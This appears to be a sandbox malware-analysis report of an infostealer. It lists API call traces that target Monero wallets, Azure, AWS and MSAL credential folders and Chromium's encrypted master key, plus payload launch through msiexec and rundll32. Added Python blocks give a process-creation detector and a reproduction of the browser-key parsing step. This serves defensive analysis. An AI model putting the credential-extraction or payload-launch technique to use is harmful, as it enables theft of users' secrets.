                              • Opcode Fuzzy Hash: 5a3b441d309653ea15ced4b3b6be3461eb7f8595c04aa27bd36ab8ce14e0ca61
                              • Instruction Fuzzy Hash: B212F071820118ABDB55EBE0DC95FEEB37ABF14701F50429DB50662091EF702A4DCF69
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0064CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0064D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0064D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D208
                              • lstrcat.KERNEL32(?,00661478), ref: 0064D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D22A
                              • lstrcat.KERNEL32(?,0066147C), ref: 0064D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D24C
                              • lstrcat.KERNEL32(?,00661480), ref: 0064D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D26E
                              • lstrcat.KERNEL32(?,00661484), ref: 0064D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D290
                              • lstrcat.KERNEL32(?,00661488), ref: 0064D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D2B2
                              • lstrcat.KERNEL32(?,0066148C), ref: 0064D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D2D4
                              • lstrcat.KERNEL32(?,00661490), ref: 0064D2E3
                                • Part of subcall function 0065A820: lstrlen.KERNEL32(00644F05,?,?,00644F05,00660DDE), ref: 0065A82B
                                • Part of subcall function 0065A820: lstrcpy.KERNEL32(00660DDE,00000000), ref: 0065A885
                              • lstrlen.KERNEL32(?), ref: 0064D32A
                              • lstrlen.KERNEL32(?), ref: 0064D339
                                • Part of subcall function 0065AA70: StrCmpCA.SHLWAPI(013D8B28,0064A7A7,?,0064A7A7,013D8B28), ref: 0065AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0064D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: cf809a9aa6e997ebc1712357a7ac1d53b1bcba71e96b8660996dea3f302266da
                              • Instruction ID: 59da69593cd8c50eab80b7e78c81a5ca9cceab7b37211da551a90c1783aa84fd
                              • Opcode Fuzzy Hash: cf809a9aa6e997ebc1712357a7ac1d53b1bcba71e96b8660996dea3f302266da
                              • Instruction Fuzzy Hash: A6E13371910108ABDB48EBE4DD95EEE737ABF14301F10425DF907A7091EE35AE09CB66
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013DD528,00000000,?,0066144C,00000000,?,?), ref: 0064CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0064CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0064CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0064CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0064CAD9
                              • StrStrA.SHLWAPI(?,013DD540,00660B52), ref: 0064CAF7
                              • StrStrA.SHLWAPI(00000000,013DD330), ref: 0064CB1E
                              • StrStrA.SHLWAPI(?,013DDF98,00000000,?,00661458,00000000,?,00000000,00000000,?,013D8BC8,00000000,?,00661454,00000000,?), ref: 0064CCA2
                              • StrStrA.SHLWAPI(00000000,013DDD18), ref: 0064CCB9
                                • Part of subcall function 0064C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0064C871
                                • Part of subcall function 0064C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0064C87C
                              • StrStrA.SHLWAPI(?,013DDD18,00000000,?,0066145C,00000000,?,00000000,013D8AF8), ref: 0064CD5A
                              • StrStrA.SHLWAPI(00000000,013D8958), ref: 0064CD71
                                • Part of subcall function 0064C820: lstrcat.KERNEL32(?,00660B46), ref: 0064C943
                                • Part of subcall function 0064C820: lstrcat.KERNEL32(?,00660B47), ref: 0064C957
                                • Part of subcall function 0064C820: lstrcat.KERNEL32(?,00660B4E), ref: 0064C978
                              • lstrlen.KERNEL32(00000000), ref: 0064CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0064CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 9795c9a696e620afd098adc12a91c653aef8e638427be970a993cbd013963edd
                              • Instruction ID: 41327d159daaeb04a88299853339ada3c2609e7cd85b34139e2f5443dc456330
                              • Opcode Fuzzy Hash: 9795c9a696e620afd098adc12a91c653aef8e638427be970a993cbd013963edd
                              • Instruction Fuzzy Hash: 26E10F71810108ABDB58EBE4DC95FEEB77ABF14301F40425DF506A7191EF306A4ACB6A
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • RegOpenKeyExA.ADVAPI32(00000000,013DB900,00000000,00020019,00000000,006605B6), ref: 006583A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00658426
                              • wsprintfA.USER32 ref: 00658459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0065847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0065848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00658499
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 705797e986393216d71b0b36741393d5662f194f53e7728403ca7c064f897d52
                              • Instruction ID: 5988075127cfeef5d142ede20c31baea0df3a6362fdac60d8f1ed39172dc04a4
                              • Opcode Fuzzy Hash: 705797e986393216d71b0b36741393d5662f194f53e7728403ca7c064f897d52
                              • Instruction Fuzzy Hash: 8A814D719111189FEB68DB94CC81FEAB7B9BF08701F008299E509A6180DF716F89CFA5
                              APIs
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00654DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00654DCD
                                • Part of subcall function 00654910: wsprintfA.USER32 ref: 0065492C
                                • Part of subcall function 00654910: FindFirstFileA.KERNEL32(?,?), ref: 00654943
                              • lstrcat.KERNEL32(?,00000000), ref: 00654E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00654E59
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,00660FDC), ref: 00654971
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,00660FE0), ref: 00654987
                                • Part of subcall function 00654910: FindNextFileA.KERNEL32(000000FF,?), ref: 00654B7D
                                • Part of subcall function 00654910: FindClose.KERNEL32(000000FF), ref: 00654B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00654EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00654EE5
                                • Part of subcall function 00654910: wsprintfA.USER32 ref: 006549B0
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,006608D2), ref: 006549C5
                                • Part of subcall function 00654910: wsprintfA.USER32 ref: 006549E2
                                • Part of subcall function 00654910: PathMatchSpecA.SHLWAPI(?,?), ref: 00654A1E
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,013DECA0), ref: 00654A4A
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,00660FF8), ref: 00654A5C
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,?), ref: 00654A70
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,00660FFC), ref: 00654A82
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,?), ref: 00654A96
                                • Part of subcall function 00654910: CopyFileA.KERNEL32(?,?,00000001), ref: 00654AAC
                                • Part of subcall function 00654910: DeleteFileA.KERNEL32(?), ref: 00654B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 2d48f573ef38364cfce79fadd89e2671b01a913688731a2e74f2fdcd724db0ed
                              • Instruction ID: 6d83630a1bfffd524a0c6b1415876b6f268657687909ab70e069bf2421200f80
                              • Opcode Fuzzy Hash: 2d48f573ef38364cfce79fadd89e2671b01a913688731a2e74f2fdcd724db0ed
                              • Instruction Fuzzy Hash: 8641C6B994020867DB54F760EC57FED7339AB24701F404598B545660C2FEB45BCD8BA2
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0065906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: fd90dd2f0d54e55a6fda0ac8845f318eaa2710d4539d1d4952ddf7f5b8e73e2a
                              • Instruction ID: 754dc63445fcfa1e87c058ca3a88018a82629fb0faa548832fc17da98bb74184
                              • Opcode Fuzzy Hash: fd90dd2f0d54e55a6fda0ac8845f318eaa2710d4539d1d4952ddf7f5b8e73e2a
                              • Instruction Fuzzy Hash: B47111B1910208EBDB18EFE8DC89FEDB7B9BF48301F108519F515AB294DB34A945CB61
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 006531C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0065335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 006534EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 23cbc8c90207ba418da0f865142d76d24b02374c1d86fa8284c3659ab1c887d2
                              • Instruction ID: af71f958040f545886f39a740ec46f60000b36a2d95794eb72f1020c66896d40
                              • Opcode Fuzzy Hash: 23cbc8c90207ba418da0f865142d76d24b02374c1d86fa8284c3659ab1c887d2
                              • Instruction Fuzzy Hash: B5120E718101189ADB49EBE0DC92FDEB77AAF14301F50426DE90666191EF302B4ECB56
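The String ID of this function (`/i "`, ` /passive`, `.msi`, `.dll`, `C:\Windows\system32\msiexec.exe`, `C:\Windows\system32\rundll32.exe`) shows it assembling a command line that hands a downloaded payload to msiexec (`/i "<file>.msi" /passive`) or to rundll32 (`<file>.dll`) and launching it through the ExecuteShell routine. The Python below is an added example, not code from the report or from the sample: a small process-creation detector run over constructed Sysmon-style records that flags silent msiexec installs and rundll32 loads from user-writable directories. The record fields, user name, file names, the rundll32 export name `Start` and the directory list are assumptions for the example; legitimate admin tooling can trip the same rules, so treat hits as triage leads rather than verdicts.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed Sysmon Event ID 1 style records. The user name, file names, parent
# process and the rundll32 export name "Start" are made up for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\system32\msiexec.exe",
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\AppData\Local\Temp\upd.msi" /passive',
     "ParentImage": r"C:\Users\victim\Downloads\XDPT5mgIBO.exe"},
    {"Image": r"C:\Windows\system32\rundll32.exe",
     "CommandLine": r'C:\Windows\system32\rundll32.exe "C:\Users\victim\AppData\Local\Temp\upd.dll",Start',
     "ParentImage": r"C:\Users\victim\Downloads\XDPT5mgIBO.exe"},
    # Benign look-alikes: a service-driven install from the MSI cache, a stock rundll32 use.
    {"Image": r"C:\Windows\system32\msiexec.exe",
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Windows\Installer\1a2b3c.msi" /qn',
     "ParentImage": r"C:\Windows\system32\services.exe"},
    {"Image": r"C:\Windows\system32\rundll32.exe",
     "CommandLine": r"C:\Windows\system32\rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Directories an unprivileged user can write to (assumed list; extend for your estate).
_USER_WRITABLE = re.compile(
    r"(?:\\Users\\[^\\]+\\(?:AppData\\(?:Local|Roaming)|Downloads|Desktop)"
    r"|\\Windows\\Temp|\\ProgramData)\\",
    re.IGNORECASE,
)
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
_QUIET_FLAGS = {"/passive", "/quiet", "/qn", "/qb", "-passive", "-quiet", "-qn"}


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event trips; an empty list means no hit."""
    hits: List[str] = []
    exe = ntpath.basename(ev["Image"]).lower()
    args = tokenize(ev["CommandLine"])[1:]
    lowered = [a.lower() for a in args]

    if exe == "msiexec.exe":
        # The sample builds '/i "<package>" ... /passive'; take the argument after /i.
        package = next((args[i + 1] for i, a in enumerate(lowered)
                        if a in ("/i", "-i") and i + 1 < len(args)), None)
        quiet = any(a in _QUIET_FLAGS for a in lowered)
        if package and package.lower().endswith(".msi") and quiet \
                and _USER_WRITABLE.search(package):
            hits.append("msiexec_silent_install_from_user_writable_path")
    elif exe == "rundll32.exe" and args:
        # rundll32 takes "<dll>,<export>"; the DLL path may be quoted on its own.
        dll = args[0].split(",", 1)[0]
        if dll.lower().endswith(".dll") and _USER_WRITABLE.search(dll):
            hits.append("rundll32_dll_from_user_writable_path")

    # Escalate when the launching process itself lives in a user-writable path.
    if hits and _USER_WRITABLE.search(ev.get("ParentImage", "")):
        hits.append("parent_in_user_writable_path")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run every record through check_event and keep the ones with findings."""
    findings: List[Tuple[int, List[str]]] = []
    for idx, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            findings.append((idx, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], hits)
```

The parent-image rule is what separates this from ordinary software deployment: msiexec with `/passive` is common, but msiexec with `/passive` on a package in `%LOCALAPPDATA%\Temp`, spawned by an executable in Downloads, is the shape this function produces.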
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 00646280: InternetOpenA.WININET(00660DFE,00000001,00000000,00000000,00000000), ref: 006462E1
                                • Part of subcall function 00646280: StrCmpCA.SHLWAPI(?,013DEC50), ref: 00646303
                                • Part of subcall function 00646280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00646335
                                • Part of subcall function 00646280: HttpOpenRequestA.WININET(00000000,GET,?,013DE238,00000000,00000000,00400100,00000000), ref: 00646385
                                • Part of subcall function 00646280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006463BF
                                • Part of subcall function 00646280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006463D1
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00655318
                              • lstrlen.KERNEL32(00000000), ref: 0065532F
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00655364
                              • lstrlen.KERNEL32(00000000), ref: 00655383
                              • lstrlen.KERNEL32(00000000), ref: 006553AE
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: same 14 dump regions (00640000 through 00CDE000) as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 30e590ea92e3cd850887fde28c16a2b63ba12efdb8db9d2fd1ca6e22580ae5b8
                              • Instruction ID: 31c2268e95303e83e1313c1abbb9d321029c4a2dd98499cf1e1b88d9bb0adbc9
                              • Opcode Fuzzy Hash: 30e590ea92e3cd850887fde28c16a2b63ba12efdb8db9d2fd1ca6e22580ae5b8
                              • Instruction Fuzzy Hash: D1511D709101489BDB58FFA4CD96AED777ABF10302F50411CFC065A592EF346B4ACB66
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: same 14 dump regions (00640000 through 00CDE000) as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 22cf7516d3229fffe5ad7e06be193a78da0cfc8164cf74e4ba60f36a15bb7066
                              • Instruction ID: 20053c7ebaddde8923105d76450c0de58a45229095f13401a6da31959d3152c2
                              • Opcode Fuzzy Hash: 22cf7516d3229fffe5ad7e06be193a78da0cfc8164cf74e4ba60f36a15bb7066
                              • Instruction Fuzzy Hash: FDC1E8B590010D9BCB58EF60DC89FEA7779BF54301F00459DF90A67281EB70AA89CF95
                              APIs
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 006542EC
                              • lstrcat.KERNEL32(?,013DE658), ref: 0065430B
                              • lstrcat.KERNEL32(?,?), ref: 0065431F
                              • lstrcat.KERNEL32(?,013DD438), ref: 00654333
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 00658D90: GetFileAttributesA.KERNEL32(00000000,?,00641B54,?,?,0066564C,?,?,00660E1F), ref: 00658D9F
                                • Part of subcall function 00649CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00649D39
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                                • Part of subcall function 006593C0: GlobalAlloc.KERNEL32(00000000,006543DD,006543DD), ref: 006593D3
                              • StrStrA.SHLWAPI(?,013DE718), ref: 006543F3
                              • GlobalFree.KERNEL32(?), ref: 00654512
                                • Part of subcall function 00649AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649AEF
                                • Part of subcall function 00649AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00644EEE,00000000,?), ref: 00649B01
                                • Part of subcall function 00649AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649B2A
                                • Part of subcall function 00649AC0: LocalFree.KERNEL32(?,?,?,?,00644EEE,00000000,?), ref: 00649B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 006544A3
                              • StrCmpCA.SHLWAPI(?,006608D1), ref: 006544C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 006544D2
                              • lstrcat.KERNEL32(00000000,?), ref: 006544E5
                              • lstrcat.KERNEL32(00000000,00660FB8), ref: 006544F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: same 14 dump regions (00640000 through 00CDE000) as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: e93b24cbc843f7c7244e730afabf9c171da5920d61c44265c2e4d6efa3a1acf2
                              • Instruction ID: 8b70431e3a2895c97ff8a0e87c902ee9aebcdf367422cd29f602bf9a94ebf7fa
                              • Opcode Fuzzy Hash: e93b24cbc843f7c7244e730afabf9c171da5920d61c44265c2e4d6efa3a1acf2
                              • Instruction Fuzzy Hash: 987155B6900208ABDB54EBE4DC85FEE737ABB48301F04459DF605A7181EA34DB49CFA5
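In the function above, SHGetFolderPathA is called with CSIDL 0x1C (CSIDL_LOCAL_APPDATA), a file under that folder is read into memory (CreateFileA, GetFileSizeEx, ReadFile), StrStrA searches it for the JSON marker `"encrypted_key":"`, and CryptStringToBinaryA with dwFlags 1 (CRYPT_STRING_BASE64) decodes what follows. That marker is how Chromium stores its DPAPI-wrapped master key in the browser's Local State file, so this is the first step of the browser-credential theft. The Python below is an added example, not code from the report or from the sample: it reproduces that parsing step offline and sets it beside the JSON-based lookup a DFIR tool should use instead. The Local State content is constructed and the bytes after the `DPAPI` tag are fake; the CryptUnprotectData step that turns the blob into the AES key is Windows-only and is not performed here.

```python
import base64
import json
from typing import Optional

# Constructed sample of a Chromium "Local State" file in the compact single-line
# form Chrome writes. The bytes after the "DPAPI" tag are made up; a real file
# carries a CryptProtectData blob there.
FAKE_MASTER_KEY_BLOB = b"DPAPI" + bytes(range(1, 33))
SAMPLE_LOCAL_STATE = json.dumps(
    {"os_crypt": {"encrypted_key": base64.b64encode(FAKE_MASTER_KEY_BLOB).decode("ascii")},
     "profile": {"last_used": "Default"}},
    separators=(",", ":"),
)
# The same content pretty-printed, to show how the substring approach breaks.
PRETTY_LOCAL_STATE = json.dumps(json.loads(SAMPLE_LOCAL_STATE), indent=2)

MARKER = '"encrypted_key":"'   # the needle the sample hands to StrStrA


def extract_key_like_sample(local_state: str) -> Optional[bytes]:
    """The stealer's approach: substring-search for the marker, take the text up
    to the closing quote, base64-decode it (CryptStringToBinaryA, dwFlags=1)."""
    i = local_state.find(MARKER)
    if i < 0:
        return None
    start = i + len(MARKER)
    end = local_state.find('"', start)
    if end < 0:
        return None
    try:
        return base64.b64decode(local_state[start:end], validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def extract_key_for_forensics(local_state: str) -> Optional[bytes]:
    """What a DFIR tool should do instead: parse the JSON, so pretty-printing or
    key reordering does not break the lookup."""
    try:
        enc = json.loads(local_state)["os_crypt"]["encrypted_key"]
        return base64.b64decode(enc, validate=True)
    except (ValueError, KeyError, TypeError):
        return None


def strip_dpapi_tag(blob: bytes) -> bytes:
    """Chromium stores the master key as b'DPAPI' + CryptProtectData(key). Removing
    the 5-byte tag leaves the DPAPI blob; only CryptUnprotectData under the victim's
    logon session recovers the 32-byte AES-GCM key, which is why stealers perform
    this step on the host instead of exfiltrating the file."""
    if not blob.startswith(b"DPAPI"):
        raise ValueError("not a DPAPI-tagged Chromium key")
    return blob[len(b"DPAPI"):]


if __name__ == "__main__":
    blob = extract_key_like_sample(SAMPLE_LOCAL_STATE)
    print(strip_dpapi_tag(blob).hex())
```

The contrast matters for detection engineering as well: because the sample keys on the exact byte sequence `"encrypted_key":"`, a memory or file scan for that literal next to a base64 run starting with `RFBBUEk` (the base64 of `DPAPI`) is a cheap indicator that this routine has executed.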
                              APIs
                                • Part of subcall function 006412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006412B4
                                • Part of subcall function 006412A0: RtlAllocateHeap.NTDLL(00000000), ref: 006412BB
                                • Part of subcall function 006412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006412D7
                                • Part of subcall function 006412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006412F5
                                • Part of subcall function 006412A0: RegCloseKey.ADVAPI32(?), ref: 006412FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0064134F
                              • lstrlen.KERNEL32(?), ref: 0064135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00641377
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00641465
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
